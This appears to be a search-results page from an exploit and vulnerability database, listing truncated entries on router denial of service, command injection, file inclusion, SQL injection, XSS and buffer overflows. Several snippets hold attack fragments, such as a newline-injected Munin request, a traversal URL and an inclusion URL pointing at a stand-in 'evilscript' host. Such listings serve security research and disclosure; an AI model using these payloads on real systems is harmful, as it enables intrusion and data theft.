206 matches found
TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service
Exploit title: 150M Wireless Lite N Router HTTP DoS Date: 28.11.2013 Exploit Author: Dino Causevic Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N Vendor Homepage: http://www.tp-link.com/ Contact: dincaus packetstormsecurity.com CVE: Firmware Version: 3.12.11 Build 1203...
Munin 2.0~rc4-1 - Remote Command Injection
source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost...
WordPress Theme Tuner Plugin 'tt-abspath' Parameter Remote File Inclusion Vulnerability
WordPress is prone to a remote file inclusion vulnerability. SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:wordpress:wordpress"...
2Wire Password Reset
require 'msf/core' class Metasploit3 '2Wire Password Reset', 'Version' = '$Revision: 1 $', 'Description' = %Q This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenicated and doesn't remove or block aft...
CollabNet Subversion Edge Log Parser - HTML Injection
source: https://www.securityfocus.com/bid/43378/info CollabNet Subversion Edge is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would run in the context of...
68designs 68kb Multiple RFI Vulnerabilities (Aug 2010) - Active Check
68designs 68kb is prone to multiple remote file include RFI vulnerabilities because it fails to sufficiently sanitize user-supplied data. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right...
NPDS REvolution Blind SQL Injection
Vulnerability ID: HTB22364 Reference: http://www.htbridge.ch/advisory/blindsqlinjectionvulnerabilityinNPDSREvolution.html Product: NPDS REvolution Vendor: NPDS Vulnerable Version: REvolution 10.02 and Probably Prior Versions Vendor Notification: 29 April 2010 Vulnerability Type: Blind SQL Injecti...
KimsQ 040109 Remote File Inclusion
KimsQ 040109 Multiple Remote File Include Vulnerability Script: http://kimsq.googlecode.com/files/kimsqv040109.zip Author: mat Mail: [email protected]...
eWebeditor - Directory Traversal
eWebeditor - Directory Traversal Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./...
PHP-Fusion Mod avatar_studio LFI
No description provided by source. Tested on: Spanish version By modifying "avatarstudio" parameter at POST data at avatarstudio.php you can retrieve all images at that dir. Also using "avatarselect" you can add yourself a file as avatar which may not be .jpg Proof of concept: POST...
Squito Gallery v.1.0 Cross Site Scripting Vulnerability
Exploit for unknown platform in category web applications. Squito Gallery v.1.0 Cross Site Scripting Vulnerability...
Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
No description provided by source. !/usr/bin/python Usage : steamcast.py victimeip Bug : SteamcastHTTP Request Remote Buffer Overflow Exploit SEH 1 Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. Tested on : Xp sp2 fr Exploited by : His0k4 Greetings : All friends &...
RoundCube Webmail <= 0.2b Remote Code Execution Exploit
No description provided by source. !/bin/sh I was hoping the PoC would not appear so soon, but now that it is out, i thought i might as well publish my real exploit. Hunger http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619 FOR LEARNING PURPOSES ONLY! PHP echoiniget'disablefunctions';...
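Verity's Search 97 Arbitrary File Viewing Vulnerability
BUGTRAQ: 162 Verity's Search97 is the web access interface for Verity's search engine. The search97.vts script in Verity's Search97 does not adequately filter user input, so a remote attacker may exploit this vulnerability to carry out a directory traversal attack, leading to disclosure of system files. The search97.vts script in the package does not adequately filter ".." in user input; an attacker may construct special requests to read any file on the server that the web service process has read permission for. 2.1 Temporary workaround: If you cannot install the patch or upgrade immediately, it is recommended that you take the following measures to reduce the threat: Temporarily stop using the software. Vendor patch: Verity ------...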
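Words tag script 'index.php' SQL Injection Vulnerability
BUGTRAQ ID: 31011 CNCAN ID:CNCAN-2008090508 Words tag script is a PHP-based web application. Words tag script does not properly handle user-submitted input; a remote attacker can exploit the vulnerability to conduct SQL injection attacks, possibly obtaining sensitive information or manipulating the database. The issue is caused by the 'index.php' script's lack of filtering of the user-submitted 'word' parameter; constructing a malicious SQL query as the parameter data can alter the original SQL logic to obtain sensitive information or manipulate the database. Source Workshop Words tag script 1.2 No solution is currently available:...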
eSyndiCat 2.2 - register.php Multiple Cross-Site Scripting Vulnerabilities
eSyndiCat 2.2 - register.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/30178/info eSyndiCat is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues t...
PlaySMS <= 0.7 SQL Injection Exploit
No description provided by source. !/usr/bin/perl PlaySMS version 0.7 and prior SQL Injection PoC Written by Noam Rathaus of Beyond Security Ltd. use IO::Socket; use strict; my $host = $ARGV0; my $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "80" ; unless $remote die...
Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion
Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...
phpCMS 1.1.7 - 'counter.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...
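A-Conman Common.Inc.PHP Remote File Inclusion Vulnerability
A-Conman is a PHP-based web application. A-Conman does not properly filter user-submitted URI data; a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The issue is caused by the 'Common.Inc.PHP' script's lack of filtering of the user-submitted 'cmbasedir' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. a-ConMan a-ConMan 3.2b No solution is currently available: http://www.a-conman.com/...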